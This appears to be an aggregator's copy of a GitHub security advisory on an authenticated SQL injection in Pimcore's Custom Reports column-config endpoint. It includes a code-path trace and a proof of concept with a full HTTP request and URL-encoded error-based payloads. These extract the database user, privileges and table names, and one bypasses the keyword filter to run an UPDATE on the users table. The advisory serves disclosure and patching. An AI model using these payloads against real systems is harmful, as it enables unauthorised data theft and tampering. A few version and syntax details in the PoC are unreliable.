What is GHSA-3234-gxc3-pq6f?

GHSA-3234-gxc3-pq6f is a security advisory published by GitHub Security Advisories with High severity. Pimcore Vulnerable to SQL Injection in Custom Reports Column Configuration

Which CVE IDs does GHSA-3234-gxc3-pq6f cover?

GHSA-3234-gxc3-pq6f covers the following CVE IDs: CVE-2026-44739. Each CVE has its own detail page on EchelonGraph Pulse with the synthesized EG score.

What is the CVSS v3 score of GHSA-3234-gxc3-pq6f?

GHSA-3234-gxc3-pq6f has a CVSS v3 base score of 8.7, published by GitHub Security Advisories.

Which products are affected by GHSA-3234-gxc3-pq6f?

GHSA-3234-gxc3-pq6f affects 1 product, including: composer/pimcore/pimcore:\u003c= 12.3.5.

GHSA-3234-gxc3-pq6fHighCVSS 8.7

Pimcore Vulnerable to SQL Injection in Custom Reports Column Configuration

Vendor

GitHub Security Advisories

Published

May 27, 2026

Last Modified

May 27, 2026

🔗 CVE IDs covered (1)

CVE-2026-44739 →

📋 Description

Summary

The columnConfigAction endpoint in the CustomReportsBundle is vulnerable to SQL injection. An attacker with the reports_config permission can supply a malicious SQL configuration that is concatenated into a query and executed. Although the application attempts to filter certain DDL/DML keywords (like UPDATE, DELETE, DROP), it fails to prevent arbitrary SELECT queries, UNION statements, or the use of dangerous database functions. Furthermore, because the application returns database error messages in the JSON response, an attacker can easily exfiltrate data using error-based SQL injection techniques.

Affected scope

bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php CustomReportController:columnConfigAction -> SqlAdapter::getColumns -> SqlAdapter::buildQueryString -> Db::fetchAssociative()

Details

The columnConfigAction endpoint in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:197 receives a configuration JSON string from the request body.
The configuration is decoded and the first element is extracted in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:207-208.
The Sql adapter is instantiated based on the user-controlled type field in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:216.
The controller calls getColumnsWithMetadata in bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:217, which in turn calls getColumns in bundles/CustomReportsBundle/src/Tool/Adapter/AbstractAdapter.php:47.
The Sql::getColumns method in bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:60 calls buildQueryString at bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:64.
buildQueryString in bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:81 concatenates various fields from the user-provided
configuration (like sql, from, where) directly into the SQL query string (lines 89, 100, 107).
The constructed SQL string is checked against a weak regex in bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:67, which can be bypassed using comments (e.g. UPDATE/**/) or by using permitted SELECT statements to exfiltrate data from unauthorized tables.
The query is executed without parameterization using $db->fetchAssociative($sql) in bundles/CustomReportsBundle/src/Tool/Adapter/Sql.php:70.
Any resulting database exception is caught in the controller and the error message is returned in the JSON response at bundles/CustomReportsBundle/src/Controller/Reports/CustomReportController.php:234, enabling error-based exfiltration.

PoC

Download and install the version Pimcore <=12.3.3 (latest)
Login using Admin account or any account that has reports_config permission
Navigate to custom reports
Capture the request using burp suite and perform SQLi attack as the following

Get Database username

POST /admin/bundle/customreports/custom-report/column-config HTTP/1.1
Host: localhost
Content-Length: 310
sec-ch-ua-platform: "Linux"
Accept-Language: en-US,en;q=0.9
sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
sec-ch-ua-mobile: ?0
X-pimcore-extjs-version-minor: 0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
X-pimcore-csrf-token: 2e42012c8310823bbdbce1598bdecfd19cb5e9c4
X-pimcore-extjs-version-major: 7
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin/
Accept-Encoding: gzip, deflate, br
Cookie: pimcore_admin_auth_profile_token=9f990b; PHPSESSID=d101f6fce4d87b8bdbbe800f9f50c82a; _pc_vis=3a17250fba52c657; _pc_ses=1774896807012; _pc_tss=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3NzQ4OTc1MTQuNjEwNzE3LCJwdGciOnsiX20iOjEsIl9jIjoxNzc0ODk2ODA1LCJfdSI6MTc3NDg5NzUxNCwidmk6c3J1IjpbN119LCJleHAiOjE3NzQ4OTkzMTR9.uO4iHiABylQ2KyZC0p8Li9hpgWfHnNQ01GUkbeY1Wmc; _pc_tvs=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3NzQ4OTc1MTQuNjExNTA4LCJwdGciOnsiY21mOnNnIjp7Ijg2MCI6Mn0sIl9jIjoxNzc0ODc2MzQyLCJfdSI6MTc3NDg5NjgwNX0sImV4cCI6MTgwNjQzMzUxNH0.mhq_2qwWzWWGruI0VNnAwgs8QzfZfbc6Za0uGn7zNYM
Connection: keep-alive

configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%221%20AND%20(SELECT%201%20FROM%20(SELECT(EXTRACTVALUE(1%2cCONCAT(0x7e%2c(SELECT%20user())%2c0x7e))))x)%22%2c%22from%22%3a%22object_localized_CAR_en%22%2c%22where%22%3a%221%3d1%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality_Attributes

Get Database name

configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%221%20AND%20(SELECT%201%20FROM%20(SELECT(EXTRACTVALUE(1%2cCONCAT(0x7e%2c(select%2bcurrent_setting(%24%24is_superuser%24%24))%2c0x7e))))x)%22%2c%22from%22%3a%22object_localized_CAR_en%22%2c%22where%22%3a%221%3d1%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality_Attributes

Get Tables names Note: Update the limit parameter to iterate around the tables queries like limit 0,1 limit 1,1 , limit 2,1 ..etc

configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%22(SELECT%201%20FROM%20(SELECT(EXTRACTVALUE(1%2cCONCAT(0x7e%2c(SELECT%20table_name%20FROM%20information_schema.tables%20WHERE%20table_schema%3ddatabase()%20LIMIT%200%2c1)%2c0x7e))))x)%22%2c%22from%22%3a%22object_localized_CAR_en%22%2c%22where%22%3a%221%3d1%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality_Attributes

Bypass the implemented Regex and perform SQL updat eto for exmaple update the admin username

configuration=%5b%7b%22type%22%3a%22sql%22%2c%22sql%22%3a%22*%22%2c%22from%22%3a%22users%22%2c%22where%22%3a%22id%3d1)%2f**%2fOR%2f**%2f1%3d1%3b%2f**%2fUPDATE%2f**%2fusers%2f**%2fSET%2f**%2fname%3d'admin'%2f**%2fWHERE%2f**%2fname%3d'admin2'%3b--%20-%22%2c%22groupby%22%3a%22attributesAvailable%22%7d%5d&name=Quality_Attributes

Impact

By exploiting this vulneability any user with custom-report access could manipuate and crawl the database information and also bypass the application filters to Update,insert or delete database tables, which impact on the application confidentiality ,intergrity and service availability

🎯 Affected products1

composer/pimcore/pimcore:<= 12.3.5